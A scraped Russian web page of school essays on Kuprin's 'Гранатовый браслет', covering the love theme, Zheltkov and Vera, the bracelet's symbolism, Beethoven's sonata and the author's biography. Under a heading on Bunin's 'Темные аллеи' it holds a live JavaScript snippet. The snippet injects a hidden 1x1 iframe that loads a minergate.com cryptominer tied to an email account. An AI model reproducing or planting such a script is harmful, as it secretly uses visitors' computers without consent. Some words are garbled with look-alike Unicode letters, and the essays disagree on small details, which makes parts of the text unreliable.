"Гранатовый браслет": тема любви в произведении Куприна. Повесть «Гранатовый браслет»: история создания. Образы главных героев

Тема любви в прозе А. Куприна (На примере повести «Гранатовый браслет»)

Любить истинно может только вполне созревшая душа…

В. Г.Белинский

Тема любви занимает в творчестве А. И. Куприна важное место. Ей посвящены такие произведения, как «Олеся», «Суламифь», «Гранатовый браслет» и другие. Вводя в ряд своих произведений противопоставление любовь - смерть, Куприн сначала в «Суламифи», а затем в «Гранатовом браслете» убеждает читателя, что любовь сильнее смерти, если она настоящая. В сказках великая сила любви вознаграждается счастьем, а в жизни, к сожалению, любовь, как правило, трагична. Об этом повесть Куприна «Гранатовый браслет». «Это один из самых благоуханных рассказов о любви», - писал Паустовский.

В повести «Гранатовый браслет» (1910) поначалу ничто не предвещает трагического поворота событий. На первых страницах произведения мы знакомимся с двумя сестрами - Верой Николаевной Шеиной и Анной Николаевной Фриессе.

Действие происходит на северном побережье Черного моря. Несколько печальное и грустное настроение навевает осенний пейзаж, с описания которого и начинается рассказ. Автор создает у читателя неясное ощущение беспокойства. «Пустой туман», ветер, пригибающий верхушки деревьев, - все это наводит на мрачные мысли.

Сами же события рассказа поначалу можно назвать приятными. На именины Веры Николаевны собираются гости. Но когда все сидят за столом, именинница машинально пересчитывает гостей и вдруг расстраивается, потому что их тринадцать.

На этом тревожные предзнаменования не кончаются: в разгар веселья княгиня получает подарок - браслет со старинными камнями. Когда Вера берет его в руки, ей кажется, что камни похожи на кровь. Из письма, приложенного к подарку, она узнает, что эта вещь является семейной реликвией одного странного человека, который уже много лет обожает Веру Николаевну. Кроме того, в этом же письме сообщается, что маленький зеленый камешек в центре (редкий сорт граната) призван оберегать мужчин от насильственной смерти, а женщинам сообщает дар предвидения.

Вера получает в подарок от мужа серьги из жемчуга. Как известно, жемчуг - символ слез. Возникает ощущение, что жемчуг и гранат не совместимы.

Сестра Аня дарит Вере молитвенник, что тоже символично. Наверное, выход из предстоящей трагедии Вера найдет в обращении к Богу.

Собственно гранатовый браслет и вводит в повесть тему возвышенной, «небесной» любви. Муж Веры развлекает гостей, и из его юмористического рассказа с картинками становится ясно, что история любви тайного поклонника, которого князь именует «телеграфистом», тянется уже семь лет. Более того, князь доводит свой рассказ, несмотря на протесты Веры, до логического конца - до смерти «телеграфиста» от несчастной любви. Пошлость, насмешка над «маленьким человеком», неуважение - вот что такое альбом Василия Шеина.

Художественное своеобразие этой повести как раз и заключается в незаметном возникновении и постепенном нарастании трагической темы. Гости начинают рассуждать о святой и вечной любви. Генерал Аносов рассказывает о нескольких случаях, похожих на такую любовь. Однако он считает, что небесная любовь, может, и была когда-то, но теперь невозможна. Генерал делает вывод, что «люди разучились любить». В подтверждении этой мысли можно оценить взаимоотношения Веры и ее мужа как похожие не на любовь, а на житейское удобство. А как иначе истолковать фразу Куприна о том, что их любовь перешла в дружбу? Флирт, которому предается сестра Веры, тоже не назовешь настоящей любовью. Отношения между супругами, один из которых любит, а другая позволяет себя любить, нельзя считать правильными. Поэтому любовь должна быть высокой, яркой, необычной, любовь как смерть.

Муж и брат Веры находят чиновника Желткова. Однако Вера, узнав об этом, почему-то не радуется, а пророчески понимает, что отныне Желтков обречен на смерть. И действительно, Желтков совершает самоубийство, послав Вере свое прощальное письмо, в котором говорит о своем счастье - счастье настоящей любви, дарованной ему Богом.

Оказывается, незаметный чиновник был благородным и скромным и, главное, умел любить. Его не страшила смерть, потому что в женщине, которую он полюбил, для него «воплотилась вся красота земли». Вопреки запретам светлое чувство жило в душе Желткова. Оно возвышало героя, делая его значительным как в собственных, так и в чужих глазах. На лице своего мертвого поклонника Вера Николаевна увидела такую «глубокую важность», какую замечала лишь на масках великих людей - Пушкина и Наполеона.

Несмотря на смерть, любовь торжествует. Недаром Куприн дает своему герою имя Ежий (польский вариант имени Георгий), стремясь подчеркнуть, что Желтков - победитель. Однако в повести традиционная тема «маленького человека» получает особое звучание. Желтков по-своему велик, потому что вознесен он над обыденной жизнью любовью.

Вера Николаевна прошла мимо той чистой и возвышенной любви, которая «случается раз в тысячу лет». Но и само соприкосновение с неземным чувством имело важное значение для героини. Она узнала что-то новое и необычное, стала другой. Для нее настало внутреннее пробуждение. Вера постепенно осознала подлинную роль любви. Любовь была для Веры и Желткова как неожиданный подарок.

Полному раскрытию темы любви способствует также и форма произведения. А. И. Куприну удалось осуществить в повести синтез двух видов искусства - литературы и музыки. Рассказу предшествует эпиграф из «Апассионаты» Бетховена. Все произведение проникнуто музыкой. В финале же тема вечной любви подтверждается бессмертным произведением великого композитора. Ритмически чередуясь, следуют аккорды сонаты, а им вторят рефреном слова вечной молитвы: «Да святится имя твое».

В произведениях А. Куприна мы встречаемся с любовью бескорыстной, не требующей награды. Писатель считает, что любовь - не миг, а всепоглощающее чувство, способное поглотить жизнь.

В "Гранатовом браслете" мы сталкиваемся с настоящей любовью Желткова. Он счастлив, потому что любит. Ему неважно то, что Вере Николаевне он не нужен. Как говорил И. Бунин: "Всякая любовь - великое счастье, даже если она не разделена". Желтков просто любил, ничего не требуя взамен. Вся его жизнь заключалась в Вере Шеин; он наслаждался каждой её вещью: забытым платком, программой художественной выставки, которую она однажды держала в руке. Единственной его надеждой были письма, с помощью них он общался с любимой. Он желал только одного, чтобы её нежные руки дотронулись до частички его души - листа бумаги. В знак своей пламенной любви Желтков подарил самое дорогое - гранатовый браслет.

Герой отнюдь не жалок, а глубина его чувства, способность на самопожертвование заслуживает не только сочувствия, но и преклонения. Желтков возвышается над всем обществом Шеиных, где никогда бы не возникла настоящая любовь. Они могут лишь смеяться над бедным героем, рисуя карикатуры, читая его письма. Даже в разговоре с Василием Шеиным и Мирза - Булат - Тугановским он оказывается в нравственном выигрыше. Василий Львович признаёт его чувство, понимает его страдания. Он не высокомерен при общении с героем, в отличие от Николая Николаевича. Он внимательно разглядывает Желткова, аккуратно кладёт на стол красный футляр с браслетом - ведёт себя как истинный дворянин.

Упоминание о власти Мирза - Булат - Тугановским вызывает приступ смеха у Желткова, он не понимает – как власть может запретить ему любить?!!

Чувство героя воплощает всё представление о настоящей любви, высказанное генералом Аносовым: "Любовь, для которой совершить любой подвиг, отдать жизнь, пойти на мучения - вовсе не труд, а одна радость". Эта истина, сказанная "обломком старины" говорит нам о том, что обладать даром такой любви, "сильной, как смерть", смогут обладать лишь исключительные люди, каким является наш герой.

Аносов оказался мудрым учителем, он помог Вере Николаевне понять глубину чувств Желткова. "В шесть часов пришёл почтальон", Вера узнала нежный почерк Пе Пе Же. Это было его последнее письмо. Оно было проникнуто насквозь святостью чувства, не было в нём горечи прощания. Желтков желает счастья любимой с другим, "и пусть ничто житейской не тревожит Вашу душу", наверное, себя он относил тоже к чемуто житейскому в её жизни. Невольно вспоминается Пушкинское – "Я не хочу печалить Вас ничем".

Недаром, Вера Николаевна, глядя на мёртвого Желткова, сравнивает его с великими людьми. Так же, как они, герой обладал мечтой, сильной волей, как они он мог любить. Вера Шеин поняла какую любовь потеряла, и, слушая сонату Бетховена, осознала, что Желтков прощает её. "Да святится имя твоё" повторяется пять раз в её сознании, как пять составных частей гранатового браслета...

«ГРАНАТОВЫЙ БРАСЛЕТ»

Еще в одном произведении, взволновавшем меня, которое называется “Гранатовый браслет”, тоже показана настоящая любовь. В этом произведении Куприн изображает хрупкость и незащищенность высоких человеческих чувств. Г. С. Желтков - один из служащих в казенном учреждении. Он уже восемь лет влюблен в Веру Николаевну Шеину, но его чувства безответны. Желтков еще до замужества Веры писал ей любовные письма. Но никто не знал, кто их посылает, так как Желтков подписывался инициалами “П. П. Ж.”. Предполагали, что это ненормальный, сумасшедший, безумец, “маниак”. Но это был человек, который по-настоящему любил. Любовь Желткова была бескорыстной, самоотверженной, не ждущей награды, “любовь, для которой совершить любой подвиг, отдать жизнь, пойти на мучение - вовсе не труд, а одна радость”. Вот именно такой и была любовь Желткова к Вере. В своей жизни он любил только ее и больше никого. Вера для него была единственной радостью в жизни, единственным утешением, “единой мыслью”. И так как его любовь не имела будущего, она была безнадежной, он покончил жизнь самоубийством.

Героиня замужем, но она любит мужа, а к господину Желткову, напротив, не испытывает никаких чувств, кроме досады. И сам Желтков кажется нам сначала просто пошлым ухажером. Так воспринимает его и Вера, и ее семья. Но в рассказе о спокойной и счастливой жизни мелькают тревожные нотки: это роковая любовь брата Вериного мужа; любовь-обожание, которую питает к Вериной сестре муж; неудавшаяся любовь дедушки Веры, именно этот генерал говорит о том, что настоящая любовь должна быть трагедией, а в жизни ее опошляют, мешает быт и разного рода условности. Он рассказывает две истории (одна из них чем-то даже напоминает сюжет “Поединка”), где настоящая любовь превращается в фарс. Слушающая эту историю, Вера уже получила гранатовый браслет с кровавым камнем, который должен уберечь ее от несчастья, а прежнего своего хозяина мог спасти от насильственной смерти. Именно с этого подарка меняется отношение читателя к Желткову. Он жертвует ради своей любви всем: карьерой, деньгами, душевным спокойствием. И не требует ничего взамен.

Но опять пустые светские условности губят даже это призрачное счастье. Николай, деверь Веры, который когда-то сам уступил свою любовь этим предрассудкам, теперь требует того же от Желткова, он грозит тюрьмой, судом общества, своими связями. Но Желтков резонно возражает: что все эти угрозы могут сделать с его любовью? В отличие от Николая (и от Ромашова) он готов бороться и отстаивать свое чувство. Преграды, поставленные обществом, для него ничего не значат. Только ради покоя любимой он готов отказаться от любви, но вместе с жизнью: он кончает с собой.

Теперь Вера понимает, что она потеряла. Если Шурочка отказалась от чувства ради благополучия и сделала это сознательно, то Вера просто не увидела большого чувства. Но ведь в конечном счете она и не хотела увидеть его, она предпочла покой и привычную жизнь (хотя от нее ничего и не требовали) и этим как бы предала любящего ее человека. Но истинная любовь великодушна - ее простили.

По определению самого Куприна, “Гранатовый браслет” - самая “целомудренная” его вещь. Традиционный сюжет о маленьком чиновнике и женщине светского общества Куприн развернул в поэму о безответной любви, возвышенной, бескорыстной, самозабвенной.

Обладателем душевных богатств, красоты чувства в рассказе выступает бедный человек - чиновник Желтков, семь лет искренне любивший княгиню Веру Николаевну Шеину. “Для него не существовало жизни без тебя”, - сказал о Желткове муж княгини - князь Василий. Желтков любил Шеину без малейшей надежды на взаимность. Счастьем для него было уже то, что она читала его письма. Желткову были дороги все мелочи, связанные с ней. Он хранил платок, забытый ею, программку, которую она держала, записку, в которой княгиня запретила писать ей. Он поклонялся этим вещам, как поклоняются верующие святым реликвиям. “Я мысленно кланяюсь до земли мебели, на которой Вы сидите, паркету, по которому Вы ходите, деревьям, которые Вы мимоходом трогаете, прислуге, с которой Вы говорите”. Желтков обожествлял княгиню, даже умирая: “Уходя, я в восторге говорю: “Да святится имя Твое”. В скучной жизни мелкого чиновника, в постоянной борьбе за жизнь, работе за кусок хлеба это внезапно возникнувшее чувство было, по словам самого героя, “... громадное счастье... любовь, которою Богу было угодно за что-то меня вознаградить”.

Желткова не способен был понять брат княгини Веры, но ее муж - князь Василий Львович - оценил чувство этого человека, хоть и вынужден был по законам приличия прекратить эту историю. Он предчувствовал трагический конец: “Мне казалось, что я присутствую при громадном страдании, от которого люди умирают”, - признается он Вере.

Княгиня Вера сначала относилась с некоторым презрением к письмам и подаркам Г. С. Ж., затем в ее душе шевельнулась жалость к несчастному влюбленному. После смерти Желткова “...она поняла, что та любовь, о которой мечтает каждая женщина, прошла мимо нее”.

В согласие с собой после смерти Желткова Вера пришла только после того, как по просьбе человека, покончившего ради нее с жизнью, прослушала “лучшее произведение Бетховена” - Вторую сонату. Музыка как бы говорила ей от имени души Желткова: “мы с тобой любим друг друга только одно мгновение, но навеки”.. И Вера чувствует, что в душе бедного человека в час смерти действительно не шевельнулись ни злоба, ни ненависть, ни даже обида к ней, виновнице большого счастья и большой трагедии жизни Желткова, и что умирал он любя и благословляя свою возлюбленную.

Куприн показал в своей повести “Гранатовый браслет” светлые человеческие чувства, противопоставляемые черствости окружающего мира.

В рассказе “Гранатовый браслет” Куприн со всей силой своего мастерства развивает идею о настоящей любви. Он не хочет смириться с пошлыми, практичными взглядами на любовь и брак, обращая наше внимание на эти проблемы довольно необычным способом, равняясь на идеальное чувство. Устами генерала Аносова он говорит: “...Люди в наше время разучились любить! Не вижу настоящей любви. Да и в мое время не видел”. Что это? Вызов? Неужели же то, что мы чувствуем, не истина? Есть же у нас спокойное умеренное счастье с нужным нам человеком. Чего же больше? По Куприну, “Любовь должна быть трагедией. Величайшей тайной в мире! Никакие жизненные удобства, расчеты и компромиссы не должны ее касаться”. Только тогда любовь можно будет назвать настоящим чувством, до конца истинным и нравственным.

Я до сих пор не могу забыть, какое впечатление произвели на меня чувства Желткова. Как сильно он любил Веру Николаевну, что смог покончить с собой! Это же безумие! Любя княгиню Шеину “семь лет безнадежной и вежливой любовью”, он, ни разу не встречаясь с ней, говоря о своей любви только в письмах, вдруг кончает жизнь самоубийством! Не оттого же, что брат Веры Николаевны собирается обратиться к власти, и не оттого, что вернули его подарок - гранатовый браслет. (Он является символом глубокой огненной любви и одновременно жутким кровавым знаком смерти.) И, наверно, уж не из-за того, что растратил казенные деньги. Для Желткова просто не было другого выхода. Он любил замужнюю женщину так, что не мог не думать о ней и минуты, существовать без того, чтобы не вспоминать ее улыбку, взгляд, звук походки. Он сам говорит мужу Веры: “Остается только одно - смерть... Вы хотите, я приму ее в какой угодно форме”. Ужасно то, что к этому решению его подтолкнули брат и муж Веры Николаевны, пришедшие требовать оставить их семью в покое. Они оказались как бы косвенными виновниками его гибели. Они имели право требовать покой, но со стороны Николая Николаевича была недопустима, даже смешна угроза обращаться к власти. Как власть может запретить человеку любить!

Идеалом Куприна является “любовь бескорыстная, самоотверженная, не ждущая награды”, та, за которую можно и жизнь отдать и что угодно вынести. Именно такой любовью, которая бывает раз в тысячу лет, любил Желтков. Это было его потребностью, смыслом жизни, и это он доказал: “Ни жалобы, ни упрека, ни боли самолюбия я не знал, я перед тобою одна молитва: “Да святится имя твое”. Слова эти, которыми была переполнена его душа, чувствует княгиня Вера в звуках бессмертной сонаты Бетховена. Они не могут оставить равнодушным и вселяют в нас безудержное желание стремиться к такому же бесподобно чистому чувству. Его корни восходят к нравственности и душевной гармонии в человеке... Княгиня Вера не жалела о том, что любовь эта, “о которой мечтает каждая женщина, прошла мимо нее”. Она плачет от того, что душа ее переполнена восхищением перед возвышенными, почти неземными чувствами.

У человека, который смог так сильно полюбить, должно быть какое-то особое мировосприятие. Хотя Желтков был всего лишь маленьким чиновником, он оказался выше общественных норм и стандартов. Таких людей, как они, людская молва возводит в ранг святых, и долго живет о них светлая память.


Есть у А. И. Куприна одна заветная тема. Он прикасается к ней целомудренно, благоговейно и нервно. Да иначе к ней и нельзя прикасаться. Это тема любви. Порой кажется, что о любви в мировой литературе сказано все. Что можно поведать о любви после шекспировской истории Ромео и Джульетты, после пушкинского «Евгения Онегина, после «Анны Карениной» Льва Толстого? Можно продолжать ϶ᴛόᴛсписок творений, воспевших трагизм любви. Но у любви тысячи оттенков, и в каждом её проявлении своя светоносность, своя печаль, свой излом и свое благоухание. Один из самых благоуханных и томительных рассказов о любви - и, пожалуй, самых печальных - это купринский «Гранаᴛᴏʙый браслет»

В данном рассказе истинный романтик Куприн обожествляет любовь. Каждое слово здесь светится, переливается, сверкая драгоценной огранкой, но в рассказе описана любовь трагическая. Как говорит в рассказе генерал Аносов, любимый дедушка Ани и Веры: «Любовь должна быть трагедией. Величайшей тайной в мире!» Эта великая любовь поражает самого обыкновенного человека, гнущего спину за канцелярским столом, чиновника Желткова. Он был гоᴛᴏʙ издалека обожать Веру Николаевну, он её просто боготворил: «Я мысленно кланяюсь до земли мебели, на которой Вы сидите, деревьям, которые Вы мимоходом трогаете, прислуге, с которой Вы говорите. Прекрасная, хвала тебе, страстная хвала и тихая любовь. Да святится имя Твое». Желтков не мог каждый день, каждый час, каждую минуту дарить свою любовь Вере Николаевне. Наверное, поэтому он подарил ей гранаᴛᴏʙый браслет своей прабабки - самое дорогое, что у него было, чтобы хоть как-то соединить себя с Верой. Желтков был безумно счастлив уже тем, что к ᴇᴦᴏ подарку прикасались руки его богини. Больше всего меня поразило, с какой внутренней энергией Куприн воспевает любовь. Поистине это чудо, божественное провидение встретить в жизни именно такое чувство, и тут Вере Николаевне повезло

В её судьбе засияла любовь вечная, бескорыстная, искренняя, о которой мечтает каждая женщина и на которую не способно большинство мужчин Наверное, просто" невозможно описать словами то ощущение глубочайшей ᴨᴏᴛери, которое испытала Вера Николаевна, когда поняла, что такая любовь прошла мимо нее. Особую силу рассказу придает то, что в нем любовь существует как нежданный подарок, озаривший вдруг жизнь, тусклую обыденность, всколыхнувший устоявшийся быт. Мне кажется, невозможно без душевного волнения читать конец рассказа, эти изумительные слова: «Вспоминаю каждый твой шаг, улыбку, взгляд, звук твоей походки. Сладкой грустью, тихой, прекрасной грустью овеяны мои последние воспоминания. Но я не причиню тебе горя. Я ухожу один, молча, так угодно было Богу и судьбе. Да святится имя Твое». Эти слова скорее напоминают молитву. «Гранаᴛᴏʙый браслет» - это песнь любви, и одновременно это вечная молитва о любви… Куприн говорил о «Гранаᴛᴏʙом браслете», что ничего более целомудренного он еще не писал. И это его замечание верно. У Куприна есть много тонких и превосходных рассказов о любви, об ожидании любви, о трагических её исходах, о тоске и вечной юности в душе человека. Куприн всегда и всюду благословлял любовь. Он посылал великое благословение всему сущему: земле, водам, деревьям, цветам, небесам, людям, зверям, и вечной благости, и вечной красоте, заключенной в женщине.

Страница 1 из 1



Что значит любовь в жизни героев произведений А. И. Куприна?

Как много прекрасных чувств на земле! Но самое дорогое и возвышенное - это, несомненно, любовь! Каждый поэт и писатель для того и пишет свои произведения, чтобы раскрыть людям глаза на то, чего они не видят или не хотят чувствовать. Прекрасной показана любовь в произведении Куприна "Гранатовый браслет", любовь бедного телеграфиста к богатой и знатной даме. Вот ведь как повернулась судьба! Любовь бедного Желткова была не мимолетным увлечением, а каким-то по-настоящему огромным чувством, которое может испытать каждый из нас. Началось все действительно просто шуткой, а закончилось тем, что стало с Желтковым после семи нескончаемых лет. Но вот Желтков решается на поступок, немного непонятный, но все же возвышенный и прекрасный. ...


Художественное мастерство А. И. Куприна

Александра Ивановича Куприна мы знаем как признанного мастера короткого рассказа, автора замечательных повестей. В них он создал широкую многоплановую картину русской жизни конца XIX - начала XX века. “Человек пришел в мир для безмерной свободы творчества и счастья” - эти слова из купринского очерка можно было бы взять эпиграфом ко всему его творчеству. Большой жизнелюб, он верил, что жизнь станет лучше. Мечта о счастье, о прекрасной любви - эти мотивы нашли свое отражение в творчестве Куприна....


Христианские мотивы в прозе XIX века

То, что справедливо и несправедливо,- не дано судить людям. Л. Толстой Обладая чутким сердцем, Достоевский болезненно откликался на страдания униженных и оскорбленных, которые всею силою души ненавидели хозяев помещичье-буржуазного общества Но многие из этих обиженных стояли в стороне от освободи тельной борьбы и искали выхода в религии, в любви к ближнему. Все это нашло отражение в романе Ф. М. Достоевского «Униженные и оскорбленные» и его творчестве в целом. Добролюбов отмечал, что в произведении даны два типа ге роев: «кроткие и ожесточенные». Кроткие не протестуют, смиренно принимают любые удары судьбы, стараясь противопоставить злодейству и мукам всепрощение и понимание. Это Наташ Ихменева, ее родители, рассказчик - писатель Иван Петрович. ...


Философская проблематика «Стихотворений в прозе» И. С. Тургенева

Кто хочет писать для всех времен, тот должен быть краток, сжат и ограничен существенным: он должен до скупости задумываться над каждой фразой и над каждым словом... Артур Шопенгауэр На протяжении всего творческого пути Тургенев стремился соединить свои философские и художественные искания, соединить поэзию и прозу. Это в совершенстве удается писателю в его последнем произведении - “Стихотворениях в прозе”. За пять лет (1877-1882) было написано около восьмидесяти миниатюр, разнообразных по содержанию и форме, объединяющих вопросы философии, морали, эстетики. Этюды реальной жизни сменяются фантазиями и снами, живые люди действуют рядом с аллегорическими символами. Какая бы тема ни затрагивалась в стихотворениях, в какие бы образы и жанры она ни облекалась, в них всегда отчетливо ощущается голос автора. Написанные под конец литературной деятельности, “Стихотворения в прозе” в концентрированной форме выражают многолетние философские раздумья Тургенева, различные грани его духовного облика. В художественном мире писателя всегда противостояли друг другу два голоса: пантеистическое преклонение перед красотой и совершенством природной жизни конкурировало в сознании Тургенева с шопенгауэровским представлением о мире как юдоли страданий и бессмысленных скитаний бесприютного человека. Влюбленность в земную жизнь с ее дерзкой, мимолетной красотой не исключает трагических нот, мыслей о конечности человеческой жизни. Сознание ограниченности бытия преодолевается страстным желанием жить, доходящим до жажды бессмертия и дерзкой надежды, что человеческая индивидуальность не исчезнет, а красота явления, достигнув полноты, не угаснет. ...


Философия любви в цикле И. А. Бунина «Темные аллеи»

(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body"); s.appendChild(w, s); })(); ...

Александр Иванович Куприн - выдающийся русский писатель начала ХХ века. В своих произведениях он воспевал любовь: неподдельную, искреннюю и настоящую, не требующую ничего взамен. Такие чувства дано испытать далеко не каждому человеку, а разглядеть их, принять и отдаться им среди бездны жизненных событий, способны лишь единицы.

А. И. Куприн - биография и творчество

Маленький Александр Куприн потерял отца, когда ему был всего год. Его мать, представительница старинного рода татарских князей, приняла судьбоносное для мальчика решение переехать в Москву. В 10 лет он поступил в Московскую военную академию, полученное образование сыграло заметную роль в творчестве писателя.

Позже он создаст не одно произведение, посвященное своей военной юности: воспоминания писателя можно узнать в повестях «На переломе (Кадеты)», «Прапорщик армейский», в романе «Юнкера». 4 года Куприн оставался офицером пехотного полка, но желание стать романистом не оставляло его никогда: первое известное произведение, повесть «Впотьмах», Куприн написал в 22 года. Жизнь армии еще не раз найдет отражение в его творчестве, в том числе и в наиболее значительном его произведении, повести «Поединок». Одной из важных тем, сделавшей произведения писателя классикой русской литературы, стала любовь. Куприн, виртуозно владея пером, создавая невероятно реалистичные, детальные и продуманные образы, не боялся демонстрировать реалии общества, обнажая самые безнравственные его стороны, как, например, в повести «Яма».

Повесть «Гранатовый браслет»: история создания

Работу над повестью Куприн начал в непростые для страны времена: закончилась одна революция, закружилась воронка другой. Тема любви в произведении Куприна «Гранатовый браслет» создается в противовес настроению общества, она становится искренней, честной, бескорыстной. «Гранатовый браслет» стал одой такой любви, молитвой и реквиемом по ней.

Повесть была опубликована в 1911 году. За ее основу была взята реальная история, которая произвела на писателя глубокое впечатление, Куприн практически полностью сохранил ее в своем произведении. Изменению подвергся лишь финал: в оригинале прототип Желткова отказался от своей любви, но остался жив. Самоубийство, которым закончилась любовь Желткова в повести - это лишь другая интерпретация трагического окончания невероятных чувств, позволяющая максимально полно продемонстрировать разрушительную силу черствости и безволия людей того времени, о чем и повествует «Гранатовый браслет». Тема любви в произведении является одной из ключевых, она детально проработана, а то, что история создана на основе реальных событий, делает ее еще более выразительной.

Тема любви в произведении Куприна «Гранатовый браслет» находится в центре сюжета. Главная героиня произведения - Вера Николаевна Шеина, супруга князя. Ей постоянно приходят письма от тайного воздыхателя, но однажды поклонник преподносит ей дорогой подарок - гранатовый браслет. Тема любви в произведении начинается именно здесь. Посчитав такой подарок неприличным и компрометирующим, она рассказала о нем своему мужу и брату. Воспользовавшись связями, они легко находят отправителя подарка.

Им оказывается скромный и мелкий чиновник Георгий Желтков, который, случайно увидев Шеину, полюбил ее всем сердцем и душой. Он довольствовался своей позволяя себе изредка писать письма. Князь явился к нему с разговором, после чего Желтков почувствовал, что он подвел свою чистую и непорочную любовь, предал Веру Николаевну, скомпрометировав ее своим подарком. Он написал прощальное письмо, где попросил свою любимую простить его и послушать на прощание сонату для фортепиано №2 Бетховена, а затем застрелился. Эта история встревожила и заинтересовала Шеину, она, получив разрешение у мужа, отправилась на квартиру покойного Желткова. Там она впервые в жизни испытала те чувства, которые не признавала на протяжении всех восьми лет существования этой любви. Уже дома, слушая ту самую мелодию, она понимает, что потеряла шанс на счастье. Так раскрывается тема любви в произведении «Гранатовый браслет».

Образы главных героев

Образы главных героев отражают социальные реалии не только того времени. Эти роли характерны для человечества в целом. В погоне за статусом, материальным благополучием человек снова и снова отказывается от самого главного - светлого и чистого чувства, которому не нужны дорогие подарки и громкие слова.
Образ Георгия Желткова - главное тому подтверждение. Он не богат, ничем не примечателен. Это скромный человек, не требующий ничего взамен своей любви. Даже в предсмертной записке он обозначает ложную причину своего поступка, чтобы не навлечь беду на любимую, равнодушно отказавшуюся от него.

Вера Николаевна - молодая женщина, привыкшая жить исключительно в соответствии с устоями общества. Она не чурается любви, но не считает ее жизненной необходимостью. У нее есть муж, который смог дать ей все, что ей было необходимо, и она не считает возможным существование других чувств. Так происходит до того, пока она не сталкивается с бездной после смерти Желткова - то единственное, что может будоражить сердце и вдохновлять, оказалось безнадежно упущенным.

Главная тема повести «Гранатовый браслет» - тема любви в произведении

Любовь в повести - это символ благородства души. Этого нет у черствого князя Шеина или у Николая, черствой можно назвать и саму Веру Николаевну - до момента поездки на квартиру покойного. Любовь была высшим проявлением счастья для Желткова, ему не требовалось больше ничего, он находил блаженство и великолепие жизни в своих чувствах. Вера Николаевна видела в этой безответной любви лишь трагедию, ее поклонник вызывал у нее лишь жалость, и в этом кроется главная драма героини - она была не способна оценить красоту и чистоту этих чувств, это отмечает каждое сочинение по произведению «Гранатовый браслет». Тема любви, по-разному истолкованная, неизменно будет встречаться в каждом тексте.

Предательство любви совершила сама Вера Николаевна, когда отнесла браслет мужу и брату - устои общества оказались для нее важнее единственного светлого и бескорыстного чувства, которое имело место в ее эмоционально скудной жизни. Она понимает это слишком поздно: то чувство, которое встречается раз в несколько сотен лет, исчезло. Оно легко коснулось ее, но она не смогла разглядеть этого прикосновения.

Любовь, приводящая к саморазрушению

Сам Куприн ранее в своих очерках как-то выразил мысль, что любовь - это всегда трагедия, она содержит в равной степени все эмоции и радости, боль, счастье, радость и смерть. Все эти чувства помещались в одном маленьком человеке, Георгии Желткове, который видел искреннее счастье в безответных чувствах к холодной и недоступной женщине. Его любовь не имела взлетов и падений, пока в нее не вмешалась грубая сила в лице Василия Шеина. Воскрешение любви и воскрешение самого Желткова символично происходит в момент прозрения Веры Николаевны, когда она слушает ту самую музыку Бетховена и плачет у акации. Таков «Гранатовый браслет» - тема любви в произведении полна печали и горечи.

Главные выводы из произведения

Пожалуй, главной линией является тема любви в произведении. Куприн демонстрирует глубину чувств, которые далеко не каждая душа способна понять и принять.

Любовь у Куприна требует отказа от моралей и норм, насильственно навязанных обществом. Для любви не нужны деньги или высокое положение в обществе, но она требует от человека гораздо большего: бескорыстности, искренности, полной самоотдачи и самоотверженности. Хочется отметить следующее, заканчивая анализ произведения «Гранатовый браслет»: тема любви в нем заставляет отрекаться от всех социальных ценностей, но взамен дарует истинное счастье.

Культурное наследие произведения

Огромный вклад в развитие любовной лирики сделал Куприн: «Гранатовый браслет», анализ произведения, тема любви и ее изучение стали обязательными в школьной программе. Это произведение также неоднократно экранизировалось. Первый фильм по мотивам повести вышел уже через 4 года после публикации, в 1914 году.

Им. Н. М. Загурского в 2013 году поставил одноименный балет.